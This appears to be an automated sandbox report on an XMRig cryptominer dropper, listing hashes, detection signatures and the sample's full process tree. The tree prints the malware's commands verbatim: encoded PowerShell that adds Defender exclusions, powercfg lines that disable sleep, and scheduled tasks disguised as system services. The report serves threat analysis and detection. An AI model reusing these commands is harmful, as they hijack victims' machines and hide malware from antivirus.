xmrig | b31d98141c7e27189ee3bdb7981fbfbf6647c8ae6e72f9181335641f017568be

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
01-04-2023 01:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe
Size

259KB
MD5

2ad612921934ed0afd281ac0c3d89598
SHA1

f7c06c8697b441cc8f08cebb1b26631fa6c97e8a
SHA256

b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2
SHA512

8a3f554913e12930e80b0122394923d23da2c1da4a306920d94af59742dbaf0a481f78e28beaace3c159767aabafa1fff969175d9f5b3e4d0ff24ade244da9ce
SSDEEP

6144:5+IjNIIRkP9HRNyD/NRxgdg5UwCYoAhLobHvHkxhfA:5ZjtRkPrNe/9r2wCFAhcbHvHKe

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	family_xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
behavioral2/memory/3032-327-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-328-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-330-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-332-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-333-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-335-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/3032-336-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

AppLaunch.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts AppLaunch.exe
Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

2624 dllhost.exe
3032 winlogson.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

pid	process
2624	dllhost.exe
3032	winlogson.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe

description	pid	process	target process
PID 1712 set thread context of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1560 1712 WerFault.exe b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe

pid	pid_target	process	target process
1560	1712	WerFault.exe	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1052	schtasks.exe
3732	schtasks.exe
4032	schtasks.exe
2944	schtasks.exe
1424	schtasks.exe
2968	schtasks.exe
1568	schtasks.exe
2800	schtasks.exe
3080	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid	process
1868	AppLaunch.exe
4552	powershell.exe
4552	powershell.exe
2020	powershell.exe
2020	powershell.exe
396	powershell.exe
396	powershell.exe
4480	powershell.exe
4480	powershell.exe
1220	powershell.exe
1220	powershell.exe
1712	powershell.exe
1712	powershell.exe
396	powershell.exe
4480	powershell.exe
2020	powershell.exe
1220	powershell.exe
1712	powershell.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe
2624	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

AppLaunch.exepowershell.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedllhost.exepowercfg.exewinlogson.exe

description	pid	process
Token: SeDebugPrivilege	1868	AppLaunch.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeShutdownPrivilege	1232	powercfg.exe
Token: SeCreatePagefilePrivilege	1232	powercfg.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeShutdownPrivilege	2528	powercfg.exe
Token: SeCreatePagefilePrivilege	2528	powercfg.exe
Token: SeShutdownPrivilege	4044	powercfg.exe
Token: SeCreatePagefilePrivilege	4044	powercfg.exe
Token: SeShutdownPrivilege	788	powercfg.exe
Token: SeCreatePagefilePrivilege	788	powercfg.exe
Token: SeDebugPrivilege	2624	dllhost.exe
Token: SeShutdownPrivilege	1792	powercfg.exe
Token: SeCreatePagefilePrivilege	1792	powercfg.exe
Token: SeShutdownPrivilege	1792	powercfg.exe
Token: SeCreatePagefilePrivilege	1792	powercfg.exe
Token: SeLockMemoryPrivilege	3032	winlogson.exe
Token: SeLockMemoryPrivilege	3032	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

3032 winlogson.exe

pid	process
3032	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exeAppLaunch.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1712 wrote to memory of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe
PID 1712 wrote to memory of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe
PID 1712 wrote to memory of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe
PID 1712 wrote to memory of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe
PID 1712 wrote to memory of 1868	1712	b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe	AppLaunch.exe
PID 1868 wrote to memory of 4272	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4272	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4272	1868	AppLaunch.exe	cmd.exe
PID 4272 wrote to memory of 4552	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 4552	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 4552	4272	cmd.exe	powershell.exe
PID 1868 wrote to memory of 2624	1868	AppLaunch.exe	dllhost.exe
PID 1868 wrote to memory of 2624	1868	AppLaunch.exe	dllhost.exe
PID 1868 wrote to memory of 2624	1868	AppLaunch.exe	dllhost.exe
PID 1868 wrote to memory of 3016	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3016	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3016	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2112	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2112	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2112	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3188	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3188	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3188	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2948	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2948	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2948	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2700	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2700	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2700	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3376	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3376	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3376	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2120	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2120	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2120	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2868	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2868	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 2868	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4152	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4152	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4152	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3636	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3636	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 3636	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4796	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4796	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4796	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4436	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4436	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4436	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4780	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4780	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 4780	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 1904	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 1904	1868	AppLaunch.exe	cmd.exe
PID 1868 wrote to memory of 1904	1868	AppLaunch.exe	cmd.exe
PID 4796 wrote to memory of 2020	4796	cmd.exe	powershell.exe
PID 4796 wrote to memory of 2020	4796	cmd.exe	powershell.exe
PID 4796 wrote to memory of 2020	4796	cmd.exe	powershell.exe
PID 1904 wrote to memory of 1232	1904	cmd.exe	powercfg.exe
PID 1904 wrote to memory of 1232	1904	cmd.exe	powercfg.exe
PID 1904 wrote to memory of 1232	1904	cmd.exe	powercfg.exe
PID 4780 wrote to memory of 4480	4780	cmd.exe	powershell.exe
PID 4780 wrote to memory of 4480	4780	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe
"C:\Users\Admin\AppData\Local\Temp\b5d5be601398f8adcad9083ee4f1145e383d22e8a8aab7c8e8e5d059b629beb2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGUAegA0AE4ASgBqAG4AcwBaAEgARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFgAYQBRAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMQA2AFgAMwB1AFoATgA0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEwAbQBLADAAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGUAegA0AE4ASgBqAG4AcwBaAEgARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFgAYQBRAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMQA2AFgAMwB1AFoATgA0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEwAbQBLADAAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:4476

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:4256

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3032

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAG0ALwRmABYEFwRLAEMATgAzBGEAHAQsBE4EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAQBCUEEwQwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwATBFcAOwQjBDUAJQQjAD4AIABAACgAIAA8ACMAZQBxAHcAeAAoBFUAQAR1AFUAMQRLADIAMgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOAQ/BFYAMwArBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBDAFUALgRWADYAHAQ8BBQEWgA0AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbAAsBEYAbQBxAFQAegBEBFIASgQjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0ALwRmABYEFwRLAEMATgAzBGEAHAQsBE4EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAQBCUEEwQwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwATBFcAOwQjBDUAJQQjAD4AIABAACgAIAA8ACMAZQBxAHcAeAAoBFUAQAR1AFUAMQRLADIAMgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOAQ/BFYAMwArBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBDAFUALgRWADYAHAQ8BBQEWgA0AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbAAsBEYAbQBxAFQAegBEBFIASgQjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo rнTБklЦHOвuвэrШт & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo жтЙЖщиQ4ЬайcEGNл
3⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:3080

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFkAVAAwAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1AG4ANgRyAE0AWABABCAEQwBBBC4EeABRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA8BDQEPQR0AHQATQQjAD4AIABAACgAIAA8ACMATgROADcEQQBIADcAKARLBC4EVwA0AHgAVwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAHAQ2ADYEUABTAEYAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACcELwQtBDMAKAQ7BCIESQQSBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEgAVgBiADgEIwA+AA=="
3⤵
PID:4436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFkAVAAwAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1AG4ANgRyAE0AWABABCAEQwBBBC4EeABRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA8BDQEPQR0AHQATQQjAD4AIABAACgAIAA8ACMATgROADcEQQBIADcAKARLBC4EVwA0AHgAVwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAHAQ2ADYEUABTAEYAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACcELwQtBDMAKAQ7BCIESQQSBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEgAVgBiADgEIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGoAIwRmADwEbAAzAC4ETgR1AE4ARARnAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzACwEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACUEbgBHBD8ENAArBDAASQRwACMEFQQjAD4AIABAACgAIAA8ACMAEwQeBDMEQgAUBCcEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACoEWgAzADgAKARZABkEEgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQgATBGkAcQAoBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAE4EHwRYAHYAQAQWBEAEcwAiBE0EIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGoAIwRmADwEbAAzAC4ETgR1AE4ARARnAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBzACwEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACUEbgBHBD8ENAArBDAASQRwACMEFQQjAD4AIABAACgAIAA8ACMAEwQeBDMEQgAUBCcEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACoEWgAzADgAKARZABkEEgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQgATBGkAcQAoBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAE4EHwRYAHYAQAQWBEAEcwAiBE0EIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAD4EFgRGACQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBCABwELwRABEQAeABNBD4EdgAvBGMARQRJBDEAEwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANQRXAE8AZwASBCMAPgAgAEAAKAAgADwAIwAVBG8AVABpAGkAWQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAFwRUAGUAOQAmBFMAZABDACUESwAgBGgAcABzACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA1BE0APARiAEYAIARuAD0EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAEwRyABQEdgApBEkAdQBvAEkAFQRTAEUEEQRrACMAPgA="
3⤵
PID:3636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAD4EFgRGACQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBCABwELwRABEQAeABNBD4EdgAvBGMARQRJBDEAEwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANQRXAE8AZwASBCMAPgAgAEAAKAAgADwAIwAVBG8AVABpAGkAWQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAFwRUAGUAOQAmBFMAZABDACUESwAgBGgAcABzACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA1BE0APARiAEYAIARuAD0EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAEwRyABQEdgApBEkAdQBvAEkAFQRTAEUEEQRrACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAMABvACMETwBsACMEJAQwABwEMAQkBBUERQQzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARARABCUEPgRABDAEJARyAEsEEgQ3BEEEbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQARCAEwAFAROAC4EFQQyABEEFARYACMAPgAgAEAAKAAgADwAIwA/BEAEdwA2BEQAUABDBDQAYgA1AEoASgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJgQ3BCwEdQA1ADUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEwEIwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBZAEgEHwRHADMAZwAjAD4A"
3⤵
PID:4152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFUAMABvACMETwBsACMEJAQwABwEMAQkBBUERQQzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARARABCUEPgRABDAEJARyAEsEEgQ3BEEEbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQARCAEwAFAROAC4EFQQyABEEFARYACMAPgAgAEAAKAAgADwAIwA/BEAEdwA2BEQAUABDBDQAYgA1AEoASgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJgQ3BCwEdQA1ADUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEwEIwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBZAEgEHwRHADMAZwAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo Nat & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo eъГуbЛСIыkoЖ
3⤵
PID:2868

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ЧЪГGд1ЯoП6лXGтP & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo АчZО
3⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1568

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo тBdЪgПzщZEяяСhдGЫь
3⤵
PID:3376

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2800

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo 4WлЙJЧlиFСjу & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo зАиGЙхжuШЮW
3⤵
PID:2700

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2944

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo щюxЫрO1CaюТnэВ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo XUpUчячг
3⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:3732

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ТхZqДэF7QkQXе
3⤵
PID:3188

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:4032

